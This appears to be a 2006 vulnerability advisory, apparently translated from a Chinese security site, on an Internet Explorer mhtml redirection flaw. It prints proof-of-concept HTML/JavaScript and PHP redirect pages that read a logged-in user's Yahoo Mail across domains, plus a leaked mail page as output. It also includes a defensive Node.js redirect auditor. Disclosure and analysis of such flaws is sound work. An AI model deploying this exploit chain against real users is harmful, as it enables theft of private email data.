IE mhtml redirection vulnerability exploitation method - vulnerability warning - the black bar safety net

2006-05-20T00:00:00
ID MYHACK58:6220069206
Type myhack58
Reporter Anonymous
Modified 2006-05-20T00:00:00

Description

Article author: yunshu_[At]_ph4nt0m.org Information source: http://www.ph4nt0m.org

This vulnerability is primarily an information leak; see http://secunia.com/advisories/19738/ for the detailed description. To keep clients safe, xmlhttp (XMLHttpRequest) is not allowed to access information across domains. Because of a security problem in IE, however, a server-side mhtml redirection can be used to make xmlhttp access sensitive information across domains. In my test, after I logged in to Yahoo Mail, I could successfully obtain the mail information through the vulnerability. The vulnerability was reported to affect IE 6.0; I used IE7 and the same attack worked.

The following is the main page, which requests a page in its own domain through xmlhttp. If this is changed to access another domain directly, an Access Denied error appears.

<html>
<head>
<script language="JavaScript">
// Start XML HTTP Request Object
var request = InitXMLHttpRequest();

function StartTest()
{
    document.getElementById("result").innerHTML = "init ok<br />";
    document.getElementById("result").innerHTML += "begin open<br />";
    // Open
    request.open('GET', 'http://www.icylife.net/valu1.php', true);
    document.getElementById("result").innerHTML += "begin send<br />";
    request.onreadystatechange = WhenDone;
    // Make the request
    request.send();
}

// Function for initialising the XMLHttpRequest
function InitXMLHttpRequest()
{
    var request;
    try
    {
        request = new XMLHttpRequest();
    }
    catch (trymicrosoft)
    {
        try
        {
            request = new ActiveXObject("Msxml2.XMLHTTP");
        }
        catch (othermicrosoft)
        {
            try
            {
                request = new ActiveXObject("Microsoft.XMLHTTP");
            }
            catch (failed)
            {
                request = false;
            }
        }
    }
    // Initialised?
    if ( ! request )
    {
        alert("Due to limitations of your browser you will not be able to use this page.");
    }
    else
    {
        return request;
    }
}

function WhenDone( )
{
    if ( request.readyState == 4 )
    {
        document.getElementById("result").innerHTML = request.responseText;
    }
}
</script>
</head>
<body>
<b>Start the test:</b><br>
<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now</font></a></div>
<br />
<div id="result"></div>
</body>
</html>

Here is the second page, which performs the mhtml redirect; the code is very simple.

<?php
header("Location: mhtml://http://icylife.net/valu2.php");
?>

Then the third one, which redirects to Yahoo Mail.

<?php
header("Location: http://mail.yahoo.com.cn/");
?>
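A defender-side complement to the three pages above, added here and not part of the original advisory: a small Node.js auditor that walks a chain of captured Location headers and reports the hop that steps out of the http/https schemes into mhtml: and the origins the chain reaches, which is the check a logging proxy or log-review pipeline would apply to spot this redirection pattern. The captured responses are constructed from the hostnames on the page; the function and field names are my own assumptions.

```javascript
// Added example (not the advisory's code): follow a chain of recorded
// HTTP redirects and report where it leaves the web schemes (mhtml: here)
// and which origins it reaches relative to the page making the request.

const WEB_SCHEMES = new Set(["http:", "https:"]);

// Constructed capture of the three pages described in the advisory, as a
// logging proxy would record them (URL -> status and Location header).
const CAPTURED = {
  "http://www.icylife.net/valu1.php": { status: 302, location: "mhtml://http://icylife.net/valu2.php" },
  "http://icylife.net/valu2.php": { status: 302, location: "http://mail.yahoo.com.cn/" },
  "http://mail.yahoo.com.cn/": { status: 200, location: null },
};

// Split a Location value into its outer scheme and the URL that is actually
// fetched: "mhtml://http://host/p" wraps an inner http URL after the scheme.
function parseTarget(location) {
  const m = /^([a-z][a-z0-9+.-]*):\/*(.*)$/i.exec(location.trim());
  if (!m) return { scheme: null, inner: location };       // relative redirect
  const scheme = m[1].toLowerCase() + ":";
  const nested = /^[a-z][a-z0-9+.-]*:\/\//i.test(m[2]);  // a URL inside the URL
  return { scheme, inner: nested ? m[2] : location };
}

// Walk the chain from startUrl. requesterOrigin is the origin of the page that
// issued the XMLHttpRequest; under the same-origin policy it should be the
// only origin the response data comes from.
function auditChain(startUrl, requesterOrigin, captured = CAPTURED, maxHops = 10) {
  const report = { hops: [], nonWebHops: [], foreignOrigins: [], finalUrl: null };
  let url = startUrl;
  for (let hop = 0; hop < maxHops && url; hop++) {
    const origin = new URL(url).origin;
    if (origin !== requesterOrigin && !report.foreignOrigins.includes(origin)) {
      report.foreignOrigins.push(origin);
    }
    report.hops.push(url);
    const resp = captured[url];
    if (!resp || !resp.location) { report.finalUrl = url; break; }
    const { scheme, inner } = parseTarget(resp.location);
    if (scheme && !WEB_SCHEMES.has(scheme)) report.nonWebHops.push({ hop, scheme, from: url });
    // Relative redirects resolve against the current URL; absolute ones
    // (including the URL wrapped inside mhtml:) are followed as-is.
    url = scheme ? inner : new URL(inner, url).href;
  }
  return report;
}

console.log(JSON.stringify(auditChain("http://www.icylife.net/valu1.php", "http://www.icylife.net"), null, 2));
```

For the constructed capture the report lists hop 0 as the mhtml: hop and http://mail.yahoo.com.cn as a foreign origin, which is exactly the cross-domain read the advisory describes.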

After I had logged in to the mail account, the result fragment of the attack was as follows:

<html>
<head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=gb2312">
<title>
Yahoo! Email - wustyunshu@yahoo.com.cn</title>
<script type="text/javascript">
<!--
if(typeof top.frames["wmailmain"] != "undefined") window.open("http://mail.yahoo.com", "_top");
// -->
</script>
<noscript>
<META HTTP-EQUIV=Refresh CONTENT="0; URL=/ym/login?nojs=1">
</noscript>